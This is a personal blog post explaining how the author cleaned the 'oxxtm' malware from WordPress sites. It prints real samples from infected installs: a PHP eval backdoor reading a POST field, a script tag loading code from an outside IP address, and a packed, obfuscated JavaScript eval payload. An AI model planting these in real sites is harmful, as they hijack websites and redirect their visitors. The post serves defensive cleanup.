About me

I’m a Software Engineering Team Lead at Entelect and I love to tinker with new tech and ideas.

Recent projects

 

Recent tags

Contact me

Malware

The dreaded oxxtm WordPress malware

February 17, 2016 by 58 Views
Let’s Talk Proximity
26 November 2014
AngularJS and Continuous integration (part 1)
25 February 2016
Malware
The dreaded oxxtm WordPress malware
February 17, 2016 by in Malware

So I have been sitting with this silly yet very sticky piece of malware on wordpress sites. It’s an attack whereby arbitrary code can be executed on your wordpress instance to hijack your site to redirect to oxxtm.com.

To save everyone some time here is what I had to do to get rid of it:

Make a backup of your database and files.

Delete all the rubbish files in the wordpress root folder (files and folders with numeric and gibberish names)

Look for any suspicious eval statements in the entire wordpress installation/ codebase. I used PHPStorm’s  “find in path” tool. Immediately you will find little eval snippets. Particularly in theme code. They look something like this. If you don’t know how to clear these just get a fresh instance of your theme and replace your theme files.

@ eval ($_POST["dd"]);

Clean up the injected javascript nasties. The culprit behind the redirect is some javascript injected into the wordpress index.php file.

<script type='text/javascript' src='https://5.157.54.13/jquery.js'</script>
<script type='text/javascript' src='/wp-includes/js/jquery/jquery.js'</script>

The first script points to some hosted js and then the second script points to your very own jquery that has been injected with even more nasties.

eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?"":e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p;}('d("\\1\\7\\4\\e\\0\\1\\3\\g\\0\\b\\f\\2\\7\\0\\4\\3\\6\\c\\l\\m\\n\\9\\6\\2\\2\\k\\h\\5\\5\\1\\1\\1\\3\\0\\a\\a\\2\\8\\3\\b\\0\\8\\9\\i\\j");',24,24,'x6f|x77|x74|x2e|x6e|x2f|x68|x69|x6d|x22|x78|x63|x72|eval|x64|x61|x6c|x3a|x3b|x20|x70|x65|x66|x3d'.split('|'),0,{}));

To fix this, simply replace these files with the original wordpress files. In my case I just copied a fresh wordpress into the site’s root directory and overrode all files.

I hope this helps and if you need any help, just drop me a line @cmptrwizard

Comments
Share
Fred

Related posts
Spring Cloud to Go – How to incorporate a Go service in the Spring Cloud Stack
Spring Cloud to Go – How to incorporate a Go service in the Spring Cloud Stack
June 1, 2020 by in Code
Spilling the beans – Six practical steps to start selling online in South Africa
Spilling the beans – Six practical steps to start selling online in South Africa
June 1, 2020 by in e-commerce
Negotiation – The MIT Mutual Gains Approach
Negotiation – The MIT Mutual Gains Approach
February 6, 2020 by in Leadership
Six leadership activities to sustain high-performance software teams
Six leadership activities to sustain high-performance software teams
June 24, 2017 by in Leadership
logo